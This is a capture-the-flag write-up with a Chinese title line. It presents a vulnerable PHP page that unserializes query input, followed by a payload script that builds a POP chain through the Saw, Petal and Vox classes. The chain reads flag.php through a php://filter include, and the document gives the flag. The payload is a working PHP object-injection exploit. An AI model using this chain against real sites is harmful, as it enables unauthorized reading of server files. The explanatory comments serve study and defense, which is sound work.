题目:
index.php You are in my range!
<?php
// Suppress every diagnostic. Warnings from a failed include() or from a
// malformed serialized string are neither displayed nor logged, which removes
// the one signal a defender would otherwise get from a probe of this page.
error_reporting(0);
/**
 * Vox: keeps a file path in a protected property and includes it on demand.
 *
 * Nothing validates the include target. Whatever value ends up in $headset
 * (or is passed to fun()) is handed directly to the PHP loader, so this class
 * is a file-inclusion sink as soon as its state is attacker-influenced.
 */
class Vox{
    protected $headset;
    public $sound;

    /**
     * Include the file named by $pulse into this method's scope.
     *
     * @param mixed $pulse path (or stream URL) passed unchanged to include
     */
    public function fun($pulse){
        include $pulse;
    }

    /**
     * Runs when an instance is called like a function: includes $headset.
     */
    public function __invoke(){
        $target = $this->headset;
        $this->fun($target);
    }
}
/**
 * Saw: remembers a file name ($fearless) and an arbitrary array ($gun).
 *
 * Once an instance arrives through unserialize(), two magic methods act on
 * attacker-chosen state: __toString() dereferences $gun['gun'], and
 * __wakeup() filters $fearless only after coercing it to a string.
 */
class Saw{
public $fearless;
public $gun;
/**
 * @param mixed $file file name to remember; echoed back without escaping
 */
public function __construct($file='index.php'){
$this->fearless = $file;
// The concatenation converts a non-string $file through its __toString(),
// and the result is printed without htmlspecialchars().
echo $this->fearless . ' You are in my range!'."<br>";
}
/**
 * String conversion. The first statement produces nothing by itself: it
 * reads ->fearless on whatever $gun['gun'] holds, and for an object that
 * has no such property that read runs the object's __get().
 */
public function __toString(){
$this->gun['gun']->fearless;
return "Saw";
}
/** Print the highlighted source of $fearless when it is truthy (local file read sink). */
public function _pain(){
if($this->fearless){
highlight_file($this->fearless);
}
}
/**
 * Runs after unserialize(). A case-insensitive deny-list over $fearless
 * (stream schemes and ".."). preg_match() takes a string, so a non-string
 * $fearless is coerced first -- an object via its __toString() -- and the
 * pattern never sees the original value. A deny-list on one field is not a
 * substitute for refusing to unserialize request data at all.
 */
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|php|\.\./i", $this->fearless)){
echo "Does it hurt? That's right";
$this->fearless = "index.php";
}
}
}
/**
 * Petal: a holder whose $seed is invoked whenever an undefined or
 * inaccessible property is read on the instance.
 *
 * Calling a stored value as a function turns a plain property read into a
 * call on attacker-chosen data once $seed is set via unserialize().
 */
class Petal{
    public $seed;

    /** Start with an empty array as the seed. */
    public function __construct(){
        $this->seed = [];
    }

    /**
     * Property-read fallback: call $seed with no arguments and return its result.
     *
     * @param string $sun name of the property being read (not used)
     * @return mixed whatever the call to $seed returns
     */
    public function __get($sun){
        return ($this->seed)();
    }
}
// NOTE(review): unserialize() on raw request input. Any class declared above
// (Vox, Saw, Petal) can be instantiated with attacker-chosen property values,
// and their magic methods run during or right after unserialization. For data
// exchange prefer json_decode(); at minimum pass ['allowed_classes' => false].
if(isset($_GET['ozo'])){
unserialize($_GET['ozo']);
}
else{
// Default path: show this file's own highlighted source.
$Saw = new Saw('index.php');
$Saw->_pain();
}
?>
<?php
// Direct-execution guard: exit unless the including script defined IN_FLAG.
// This only governs running the file; reading its source (highlight_file(),
// or an include through a read/convert filter wrapper) is not covered by it.
!defined('IN_FLAG') && exit('Access Denied');
echo "flag{un3eri@liz3_i3_s0_fun}";
?>
PAYLOAD:
<?php
/**
 * Local stand-in for the target's Vox. Only the pre-set protected $headset
 * matters to serialize(); the value is a php://filter read of flag.php that
 * base64-encodes the source instead of executing it. No methods are needed
 * here because the target runs its own __invoke()/fun().
 */
class Vox{
protected $headset='php://filter/read=convert.base64-encode/resource=flag.php';
}
/**
 * Local stand-in for the target's Saw. The methods below only run while the
 * payload is being built; after unserialize() the target uses its own.
 */
class Saw{
public $fearless;
public $gun;
public function __construct($file='index.php'){
$this->fearless = $file;
echo $this->fearless . ' You are in my range!'."<br>";
}
// Kept trivial so converting a nested Saw to a string prints nothing here.
public function __toString(){
return "";
}
// __wakeup() fires on unserialize(), not serialize(), so this local override
// never executes in this script and is not part of the serialized output.
public function __wakeup()
{
$this->fearless = new Saw();
}
}
/**
 * Local stand-in for the target's Petal with $seed holding a Vox, so the
 * serialized Petal carries that Vox as its seed.
 */
class Petal{
public $seed;
public function __construct(){
$this->seed = New Vox();
}
}
// Build the object graph (Saw -> Saw -> Petal -> Vox) and print it serialized,
// first raw and then URL-encoded for transport in a query string.
$a = new Saw('flag.php');
$a->gun['gun'] = new Petal();
$b = new Saw($a);
$pop = serialize($b);
print_r($pop);
echo "</br>";
echo urlencode($pop);
?>